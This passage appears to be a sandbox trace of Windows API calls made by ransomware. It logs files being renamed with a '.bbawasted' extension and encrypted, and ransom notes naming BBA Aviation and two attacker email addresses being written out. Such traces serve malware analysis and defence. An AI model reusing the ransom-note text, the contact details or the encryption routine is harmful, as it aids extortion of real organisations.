NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LFvTUT8b3lfjWwX6SAn83v9PpmVBgZolUgujcBH0gLB6kZOrTIkYSdGst+g/Xa0U\r\nUys7sKsINr5JhjwDcMb4F6peqJrXj2QnQaYx2zskjGg9xDnJ9Beh3Ji38S20EtSH\r\nJ5amEfrr3L6nIZeQ4EBWIHz2Q35IWDyJsHB/GXuSTwTKR31jjiYJDheTlkB7n8qS\r\ntj1N51LKdltEC/TQwbp+QezKclsY/56wpCfKxxftApYR/Mw/p6c8WbvhwfBdd/KE\r\nSSBX8AlUwb2C951OZf/LQlFEizgZuxsaLPSC5d2I1bbyVXT6NBMTtQuIDgEPZ6ff\r\nnWVQAETdr60RXa7lY0bpDWu9UP6uys+1xoBSikdKrsVgEihcS9zz+0j0Aiss5fmO\r\nA5vk+/D4Hhmi1g3dfAJge478z+25CuQPdz7n/IPtgczKDhfViC1QTwdHUs8VkhRe\r\nUZT1v4nCEo1G8kyEQ0fouHxDNZkuaMcWN3fnGv1h5pSR87wcACa9TDpKOYXW2FJc\r\nht5arzpNxkq0qSDDaY2pcNoPiLHW/YMxf7nfVV/QLlysTsLeKVoikQVDhVc/Lb3P\r\nVDzB+gKF7xuOjDTyMeMDhQohXgrY8pxtU9U2jZAglQOwVv5zmPZUhKRPVC+4QO27\r\n9ZBnCd8WF4fOsWDGkx48aOToubVb8gi7CMiH1/5Ujlt=[end_key]\r\nKEEP IT\r\n") returned 984 [0202.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0202.145] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0202.145] SetEndOfFile (hFile=0x28c) returned 1 [0202.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.148] CloseHandle (hObject=0x28c) returned 1 [0202.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0202.150] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2e70 | out: hHeap=0x660000) returned 1 [0202.150] _aulldvrm () returned 0x0 [0202.151] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0202.151] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0202.151] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0202.151] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0202.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ec) returned 0x6c4b88 [0202.152] lstrcpyW (in: lpString1=0x6c4c6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0202.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.152] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0202.153] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0202.153] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0202.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000001.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0202.153] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0202.155] SetEndOfFile (hFile=0x28c) returned 1 [0202.155] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.155] lstrcpyW (in: lpString1=0x6c4c6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0202.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000001.regtrans-ms.bbawasted")) returned 1 [0202.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000001.regtrans-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0202.157] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0202.157] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x80000 [0202.157] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x1480000 [0202.158] CloseHandle (hObject=0x294) returned 1 [0202.325] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0202.329] CloseHandle (hObject=0x290) returned 1 [0202.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0202.329] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6020) returned 1 [0202.330] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0202.330] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0202.330] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0202.331] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0202.331] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0202.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0202.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0202.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.342] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gg7UBUNxSz4aOCG0wvoNA7ePBgdlyahnQmDWCcZQ5E6e5EdfMNXyif0j5quwlA1f\r\neR6hudH060AJ6csNYAiKX4RhXCJfdDXzyvoMM6xJK3RX0RjlBJjf/xlt9V9xopU3\r\ntIoG+ypIvlKy5+GUed93YLc2Q6z84IXJ9kdbqiw6eD/gDGWJCZVs5sr57VTvWbXq\r\nEDQ6GAfMhhRh27ANvH2yIeCxnaDlzfiqo7xUAVXquFCxVwiJVpD1jgJBmm7HTYM3\r\nNDf7l99jzWhYQe4r8A846iN6SgA9p6x2TX+3RW6UWP5KT1cJMQE2oF6rWT9Ki6sg\r\nlHWJF+AAv5KM1NLMOrXAnEsP0IHybP7wmztGFcFtp0MHhDwzidbOGcuf9Z45UtdB\r\noLYVKqczQE1DxkNJ7o0YXjEbJ6hv/Vh/QeCczcvZ+0SJEibPcES2B3kAYm/L2PrM\r\nIFQdRiNyxBiiBTkQxXTBw7eT+wtBUuesDtNFyFhOGZutBzTXs6oloJO9DxlGSdMI\r\nWz5rHJoSD2G3xyohDYwZRGyYPnuLb5U0avG7UcOfSmX85ZTjQ5CUNuFi8XxTIZ1R\r\nJQxGxMmnrAn3LeGOnF8msJ9+dCiUhc/EMUsBLWAPSeMs/ZE4VrE6y5vxqQj0PDOw\r\nNp35DMDZXQS180ncfHPsEH5UmTAsGywteErxS9Gnpne=[end_key]\r\nKEEP IT\r\n") returned 984 [0202.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0202.342] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0202.342] SetEndOfFile (hFile=0x28c) returned 1 [0202.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.345] CloseHandle (hObject=0x28c) returned 1 [0202.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0202.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac300 | out: hHeap=0x660000) returned 1 [0202.348] _aulldvrm () returned 0x0 [0202.348] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6130) returned 1 [0202.349] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0202.349] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0202.349] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned 76 [0202.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a2) returned 0x6c4b88 [0202.349] lstrcpyW (in: lpString1=0x6c4c20, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0202.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.349] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0202.350] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0202.350] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0202.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0202.585] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0202.586] SetEndOfFile (hFile=0x280) returned 1 [0202.587] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.587] lstrcpyW (in: lpString1=0x6c4c20, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0202.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf.bbawasted")) returned 1 [0202.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0202.589] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0202.589] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x10000 [0202.590] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10000) returned 0x640000 [0202.590] CloseHandle (hObject=0x294) returned 1 [0202.602] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0202.602] CloseHandle (hObject=0x28c) returned 1 [0202.603] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0202.603] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0202.603] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0202.604] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0202.604] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a61b8) returned 1 [0202.604] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0202.604] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0202.618] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0202.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0202.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.619] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Mv8Wya3qA6Y5auvQbj4q4SbtGD8HWoeJf4vd2Qiz1mcz+9psrkzgtq7YRE7aCLrf\r\nKD9jgMTR8BDe7St3zK0fv9qPpxZVKJ90EHa8+YFbBR+9fAadZJNtZlbHLXO8IVZu\r\ny6U6MQ6MCixiAHnxBDlbSzvOnG8yOilJevJ18wOEVHfoeU8DPiNCR8AtxDoR4JDO\r\npGM4FrEGIjLnp2M5huwB2Wgu9+FbDOvl1MXI3cQR9qVdRxg82e1NUdy22b+E1bFW\r\n9tfAgUchuKMdmLOFEm/P4DJCfXn/Cn354kXBDMlH6GxQsQ0xlGEms6uxUu7RLwgK\r\noh2V3A52T5WEE0OyO4wwuRx6tZRxHMpf0kdvfVJsUaebHKVdY3FCwPzOx09Meiwh\r\nv4K5V6fuJ9mtNH72TPpSdsK9fLmRbwO9UdjLucqPVSbtx9DzAVj70+ec9xHtwqGb\r\n2/k5c1o3aLNtxxIuN8lliQLJY7DnGASFNJg+0f5R16yeNXrzrCGjMR7pBvaqCzxF\r\nJjakv6BATzQGlddxZvidq7yuH2y+NV75ckF9g7NjB+zr1T7qGL5ljVRZEcbxUQVp\r\ng+XjOXWx/nl4huv0bOneGFZpV9QxEnQkUta5610lzzmGB9MUeC+gaEVm2uAV9vPn\r\nPcsd6zNVr2qASevxzefFaja486AutOQQSwxF/faRayi=[end_key]\r\nKEEP IT\r\n") returned 984 [0202.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0202.619] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0202.619] SetEndOfFile (hFile=0x280) returned 1 [0202.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.622] CloseHandle (hObject=0x280) returned 1 [0202.760] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0202.761] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac580 | out: hHeap=0x660000) returned 1 [0202.761] _aulldvrm () returned 0x0 [0202.761] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0202.762] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0202.762] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0202.762] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0202.762] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ec) returned 0x6c4b88 [0202.762] lstrcpyW (in: lpString1=0x6c4c6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0202.762] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.762] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6680) returned 1 [0202.763] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0202.763] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0202.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0202.764] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0202.765] SetEndOfFile (hFile=0x280) returned 1 [0202.765] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.766] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.766] lstrcpyW (in: lpString1=0x6c4c6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0202.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms.bbawasted")) returned 1 [0202.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0202.767] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0202.767] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x80000 [0202.768] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x1500000 [0202.768] CloseHandle (hObject=0x290) returned 1 [0202.848] UnmapViewOfFile (lpBaseAddress=0x1500000) returned 1 [0202.851] CloseHandle (hObject=0x27c) returned 1 [0202.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0202.851] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0203.182] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0203.182] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0203.182] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0203.183] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0203.183] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0203.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0203.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0203.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0203.195] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 